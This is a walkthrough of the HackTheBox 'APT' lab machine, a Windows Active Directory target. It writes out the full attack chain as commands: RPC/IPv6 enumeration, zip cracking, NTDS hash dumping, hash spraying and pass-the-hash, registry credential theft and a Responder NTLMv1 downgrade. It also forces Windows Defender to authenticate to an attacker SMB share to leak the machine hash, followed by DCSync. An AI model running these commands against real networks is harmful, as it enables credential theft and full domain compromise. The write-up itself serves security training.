HTB - APT

HTB – APT

In this walk through, we will be going through the APT room from HackTheBox. This room is rated as Insane on the platform and it consists of RPC to IPV6 enumeration. Followed by exploiting registry values to get the initial access and leveraging NTLMV1 hash authentication for privilege escalation. So, let’s get started without any delay.

APT

Machine Info:

TitleAPT
IPaddress10.10.10.213
DifficultyInsane
OSWindows
DescriptionAPT is an insane difficulty Windows machine where RPC and HTTP services are only exposed. Enumeration of IPV6 address gives us access to the backup share. User enumeration and bruteforce attacks gives us access to the registry which contains login credentials and NTLMV1 hashes are used to gain privilege access.

Enumeration:

  • I started with my regular aggressive nmap scan and found only found two ports opened – 80 (HTTP) and 135 (RPC).

$ sudo nmap -A 10.10.10.213
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-30 08:49 IST

Nmap scan report for 10.10.10.213
Host is up (0.20s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   199.63 ms 10.10.14.1
2   200.31 ms 10.10.10.213

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.87 seconds

nmap scan

  • Enumerated the web server on port 80 but found nothing interesting.

Gigantic Hosting

RPC Enumeration:

  • Next, using rpcmap.py to get a list of available interfaces provided by DCOM. The three UUIDs obtained match IID_IRemoteSCMActivator , IID_IActivation and IID_IObjectExporter respectively.

rpcmap.py 'ncacn_ip_tcp:10.10.10.213' | grep -A2 'DCOM'

rpcmap.py output

  • Moving on, bruteforce the Opnum value for the found DCOM UUID. Got a success hit for value 3 and 5.

rpcmap.py 'ncacn_ip_tcp:10.10.10.213' -brute-opnums -auth-level 1 -opnum-max 5

Opnum value bruteforce

  • According to the documentation, these methods are ServerAlive and ServerAlive2 and can be used to provide network information bindings to the client for further connectivity.

from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter

target = 'ncacn_ip_tcp:10.10.10.213'
rpcTransport = transport.DCERPCTransportFactory(target)

portmap = rpcTransport.get_dce_rpc()
portmap.set_auth_level(RPC_C_AUTHN_LEVEL_NONE)
portmap.connect()

obj = IObjectExporter(portmap)

bindings = obj.ServerAlive2()

for binding in bindings:
	addr = binding['aNetworkAddr']
	print(f"Address: {addr}")

  • With the help of the above script, got some pretty interesting result. We got an IPV6 address running on the target.

python3 serveralive.py

serveralive.py result

  • Added the IP address to our /etc/hosts file.

sudo nano /etc/hosts

adding hostname

IPV6 Enumeration:

  • Next, enumerated the IP address and its services running using nmap. It seems like a Windows AD environment is running on the target IP.

nmap -6 -p- dead:beef::b885:d62a:d679:573f

IPv6 nmap scan

  • Further enumerated the open ports and services running on them.

nmap -6 -A -p 80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001 dead:beef::b885:d62a:d679:573f

IPV6 aggressive scan

IPV6 aggressive scan

  • Checked the smb shares on the given IP and got one called backup. Logged in with null credentials and downloaded the backup.zip file lying there.

smbclient //dead:beef::b885:d62a:d679:573f/backup

SMB Enumeration

Cracking ZIP password:

  • The zip file was password protected. So, used john to crack its password and got success.

zip2john backup.zip > hash
sudo john hash -w=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --fork=4

Zip2john

cracking via john

  • Using the cracked password extracted the contents of the zip file. It gives us a back of the NTDS file.

unzip backup.zip

  • Using secretsdump.py dumped the hash values from SYSTEM and NTDS.dit files.

secretsdump.py local -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit -outputfile hashes

Dumping hashes

  • First, sort out the usernames from the above result and added the domain name into my /etc/hosts file.

cut -d ':' -f 1 hashes.ntds > usernames.txt

usernames

adding hostname

  • Next, performed user enumeration on the target using kerbrute to find valid usernames. A user henry.vinson got a positive hit which might be an area of interest for us.

kerbrute userenum -d htb.local --dc apt usernames.txt

kerbrute output

  • Checked the password hashes for user henry from the secretdump.py result. Got a couple of them.

grep henry hashes.ntds

user henry hash

  • Next, passed the hash to log in user henry.vinson but got nothing back.

cme smb apt -u henry.vision -H 2de80758521541d19cabba480b260e8f

spraying the hash

  • So, i sprayed all the hashes in the dumped hashes file and surprising got a green flag on one of them.

cme smb htb.local -u henry.vinson -H hashes.txt

spraying the hashes again

got success

  • Performed a pass the hash attack to get a shell access as user henry.vinson using winrm but was unable to do so.

cme smb apt -u henry.vinson -H e53d87d42adaa3ca32bdb34a876cbffb

confirming the positive

unable to get shell

Initial Access:

  • When a user logs in, their registry hive is mounted to HKCU , which is unique to each user. However, user hives can also be accessed via the HKEY_USERS (HKU) hive. This stores registry entries for all users on the system. Impacket’s reg.py can be used to enumerate the registry.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/[email protected] query -keyName HKU

reg.py output

  • The query is successful and we’re able to list the subkeys in HKU. One interesting place to look for sensitive information is also the Software subkey. It’s used to store configuration and settings for various applications and might contain credentials.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/[email protected] query -keyName HKU\\Software

enumerating registries

  • We notice an interesting key named GiganticHostingManagementSystem and upon checking it’s contents reveals the password for user henry.vinson_adm.

reg.py -hashes :e53d87d42adaa3ca32bdb34a876cbffb htb.local/[email protected] query -keyName HKU\\Software\\GiganticHostingManagementSystem

getting the password

  • Using the found username and password combo got my initial access and captured the user flag.

evil-winrm -i apt -u henry.vinson_adm -p G1#Ny5@2dvht

getting the shell via evilwin-rm

user flag

Privilege Escalation:

  • After performing post-compromise enumeration. I came to know that we can use running Windows Defender to scan for a file in our generated share and capture the user hash using that with Responder. Ideally, these binaries are running as SYSTEM. So, we can crack the captured hash and get access as administrator. But before performing the attack, we have to set the challenge to below number below in Responder conf file this will downgrade the hash to NetNTLM V1 so that it can be cracked easily.

# Custom challenge value

1122334455667788

# Setting it in responder config file

sudo nano /etc/Responder.conf

Responder Custom challenge

  • Set up responder for our attack.

sudo responder -I tun0 --lm

Setting up responder

  • Used the below command to scan the file using Windows Defender in our fake share and got an immediate response in our Responder output.

 .\MpCmdRun.exe -Scan -ScanType 3 -File \\10.10.14.5\share\file.txt

scan the file

capturing the hash

  • Cracked the captured the NetNTLMV1 hash using below online website.

Cracking website: https://crack.sh/

APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788

crack the hash

APT$:d167c3238864b12f5f82feae86a7f798

  • With the hash we had, we performed a DC Sync attack using secretsdump.py and got the Administrator user hash.

secretsdump.py 'htb.local/APT$@apt' -hashes :d167c3238864b12f5f82feae86a7f798 -just-dc-user administrator

secretsdump.py output

  • Performed a pass the hash attack using evil-winrm to get a shell as user Administaror and captured the root flag.

evil-winrm -i apt -u Administrator -H c370bddf384a691d811ff3495e8a72e2

getting root

root flag

machine completed

Also Read: HTB – StreamIO

Conclusion:

Conclusion

So that was “APT” for you. This machine covers enumeration of existing RPC interfaces which provides an interesting object that can be used to disclose the IPv6 address. The box was found to be protected by a firewall exemption that over IPv6 can give access to a backup share. User enumeration and bruteforce attacks gave us access to the registry which contains login credentials. The machine was configured to allow authentication via the NTLMv1 protocol, which was then leveraged to gain system access. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top